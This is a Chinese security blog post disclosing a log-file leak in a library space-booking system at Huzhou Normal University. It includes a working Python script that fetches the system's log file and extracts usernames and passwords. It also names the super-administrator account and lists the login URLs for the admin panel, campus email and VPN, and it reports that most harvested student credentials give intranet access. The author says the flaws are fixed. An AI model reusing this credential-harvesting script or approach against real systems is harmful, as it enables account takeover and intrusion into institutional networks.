-->
当前位置:首页 > DayDayUp > 正文内容

IC空间管理系统通用日志泄露漏洞--以湖州师范学院为例

Luz2年前 (2021-10-16)DayDayUp4479

文中涉及到的漏洞均已修复

image.png

访问日志文件,可以看到用户登录时产生的日志文件和密码

 

以下是用户名密码获取脚本(python)

#coding:utf-8
import requests
import re
tex=requests.get('http://icspace.lib.zjhu.edu.cn/Log/log.txt').text
#print(tex)
kk = re.compile(r'user:.*')
resu=re.findall(kk,str(tex))
quchong=list(set(resu))
#print(quchong)
a=[]
for i in quchong:
    a.append(i[5:-1].split('/'))
print(a)

 

image.png

获取到的部分密码

账号:staadmin001 为最高权限管理员账号

登录地址:http://icspace.lib.zjhu.edu.cn/pages/ic/LoginForm.aspx

 

 

image.png

权限为超级管理员

 

尝试00174 可以进入校园邮箱

登录地址:http://mail.zjhu.edu.cn/


 

 

 

可以登录学校内网

VPN登录地址:https://vpn.zjhu.edu.cn/

访问学校内网所有资源


 

这仅为一个账号的测试,这里拿到的90%的学生用户的账户密码均可进入内网

50%的教师用户账户密码可以登录邮箱与内网


发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。